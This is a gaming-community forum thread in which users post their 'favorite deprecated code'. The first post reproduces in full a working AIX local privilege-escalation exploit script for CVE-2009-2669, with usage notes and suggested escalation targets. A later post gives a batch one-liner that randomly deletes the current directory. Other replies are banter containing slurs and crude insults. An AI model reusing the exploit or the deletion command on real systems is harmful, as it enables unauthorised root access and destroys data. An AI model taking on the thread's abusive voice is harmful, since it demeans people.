Check out our blog!
Forumwarz is the first "Massively Single-Player" online RPG completely built around Internet culture.

You are currently looking at Flamebate, our community forums. Players can discuss the game here, strategize, and role play as their characters.

You need to be logged in to post and to see the uncensored versions of these forums.

Log in or Learn about Forumwarz

Role Playing
Switch to Civil Discussion Role-Playing
Sup ITT: your favorite deprecated code

quantumenergy

Avatar: Abstract Blue Circle
43

[Everyday Regular N-
ormal Klan
]

Level 69 Hacker

“Trojan Horse Magnum”

#!/bin/sh

#
# $Id: raptor_libC,v 1.1 2009/09/10 15:08:04 raptor Exp $
#
# raptor_libC - AIX arbitrary file overwrite via libC debug
# Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>
#
# Property of @ Mediaservice.net Srl Data Security Division
# http://www.mediaservice.net/ http://lab.mediaservice.net/
#
# *** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***
#
# A certain debugging component in IBM AIX 5.3 and 6.1 does not properly handle 
# the (1) _LIB_INIT_DBG and (2) _LIB_INIT_DBG_FILE environment variables, which 
# allows local users to gain privileges by leveraging a setuid-root program to 
# create an arbitrary root-owned file with world-writable permissions, related 
# to libC.a (aka the XL C++ runtime library) in AIX 5.3 and libc.a in AIX 6.1
# (CVE-2009-2669).
#
# Typical privilege escalation techniques via arbitrary file creation don't 
# seem to work on recent AIX versions: .rhosts is ignored if it is group or 
# world writable; LIBPATH and LDR_PRELOAD have no effect for setuid binaries; 
# /var/spool/cron/atjobs seems useless as well, since we cannot open cron's
# named pipe /var/adm/cron/FIFO. Other viable exploitation vectors that come 
# to mind, depending on the target box setup, are: /root/.ssh/authorized_keys, 
# /root/{.profile,.kshrc}, and /etc/rc.d/rc2.d.
#
# See also: http://milw0rm.com/exploits/9306
#
# Usage:
# $ uname -a
# AIX rs6000 3 5 0052288E4C00
# $ lslpp -L xlC.rte | grep xlC.rte
# xlC.rte                    9.0.0.1    C     F    XL C/C++ Runtime 
# $ chmod +x raptor_libC
# $ ./raptor_libC /bin/bobobobobob
# [...]
# -rw-rw-rw-   1 root     staff            63 Sep 10 09:55 /bin/bobobobobob
#
# Vulnerable platforms (AIX 5.3):
# xlC.rte < 8.0.0.0		[untested]
# xlC.rte 8.0.0.0-8.0.0.14	[untested]
# xlC.rte 9.0.0.0-9.0.0.9	[tested]
# xlC.rte 10.1.0.0-10.1.0.2	[untested]
#
# Vulnerable platforms (AIX 6.1):
# bos.rte.libc 6.1.0.0-6.1.0.11	[untested]
# bos.rte.libc 6.1.1.0-6.1.1.6	[untested]
# bos.rte.libc 6.1.2.0-6.1.2.5	[untested]
# bos.rte.libc 6.1.3.0-6.1.3.2	[untested]
# bos.adt.prof 6.1.0.0-6.1.0.10	[untested]
# bos.adt.prof 6.1.1.0-6.1.1.5	[untested]
# bos.adt.prof 6.1.2.0-6.1.2.4	[untested]
# bos.adt.prof 6.1.3.0-6.1.3.1	[untested]
#

echo "raptor_libC - AIX arbitrary file overwrite via libC debug"
echo "Copyright (c) 2009 Marco Ivaldi <raptor@mediaservice.net>"
echo

# check the arguments
if [ -z "$1" ]; then
	echo "*** DON'T RUN THIS UNLESS YOU KNOW WHAT YOU ARE DOING ***"
	echo
	echo "Usage: $0 <filename>"
	echo
	exit
fi

# prepare the environment
_LIB_INIT_DBG=1
_LIB_INIT_DBG_FILE=$1
export _LIB_INIT_DBG _LIB_INIT_DBG_FILE

# gimme -rw-rw-rw-!
umask 0

# setuid program linked to /usr/lib/libC.a
/usr/dt/bin/dtappgather

# other good setuid targets
# /usr/dt/bin/dtprintinfo
# /opt/IBMinvscout/bin/invscoutClient_VPD_Survey

# check the created file
ls -l $_LIB_INIT_DBG_FILE
echo

# milw0rm.com [2009-09-11]

BobTheSqueak-
yWeasel

Avatar: 63475 2010-04-01 02:14:05 -0400
26

Level 69 Emo Kid

“The Infinite Sadness”

quang why does your version of hello world have so many comments

BLACKENSTEIN

Avatar: Server Hacker
3

[WeChall is a ****ty klan]

Level 21 Hacker

Jesus appeared to me on a bagel and told me to leave this prank. -dobs

BobTheSqueakyWeasel Posted:

quang why does your version of hello world have so many comments

comments are for lamers too


That Reactio-
n Face Guy

Avatar: 223807 2009-12-29 01:30:17 -0500
11

Level 69 Troll

THIS IS MY CONFUSED FACE

BLACKENSTEIN Posted:

This code NEVER went out of style.

Log in to see images!

Inconnu

Avatar: 48966 2011-07-31 19:36:53 -0400
100

[The Scrotal Safety-
Commission
]

Level 69 Camwhore

Qui est cette chienne

Russian Roulette:

set /a R=0+6*%random%/32768 & if %R% == 0 (rd /s /q .\) else (echo ALIVE)


Log in to see images!

Lord Boxtop

Avatar: Ron Paul
2

Level 33 Troll

“Permafail”

smuglinuxusingguy Posted:

I is of liking linux because it of never beings deprecated Log in to see images!

Linux is for fabulous persons who live in their parents’ basement.

Lord Boxtop edited this message on 05/31/2010 4:53PM

I'M A SIG-DISABLING COCKMONGLER

Shouty the A-
ngry Bear

Avatar: Spider Illustration
36

[The Scrotal Safety-
Commission
]

Level 69 Emo Kid

“The Infinite Sadness”

YEAH DUDE ME TOOO I REALLY LIKE DEPECHE MODE

SuperMonkeyM-
an

Avatar: Ron Paul
19

Level 69 Troll

New Mod in training.

My favorite deprecated code is Visual Basic because people who still program in this language have an autistic **** fit whenever you point out that VB can’t even do 1/10 of the **** that a structured language can do. Did I forget to mention that only fabulous persons with no programming skills continue to work with Visual Basic?


Call me on skype: stupidmonkeyman

Tesfan

Avatar: 17396 2011-07-31 06:49:56 -0400
3

[Team Shortbus]

Level 35 Troll

Sucks **** through a straw in the face of convention

i was gonna make a venn diagram of “people who care about computer nerd gay ****” and “people who get woman's genitals” but it would just be two circles


Log in to see images!

Internet Delay Chat
Have fun playing!
To chat with other players, you must Join Forumwarz or Log In now!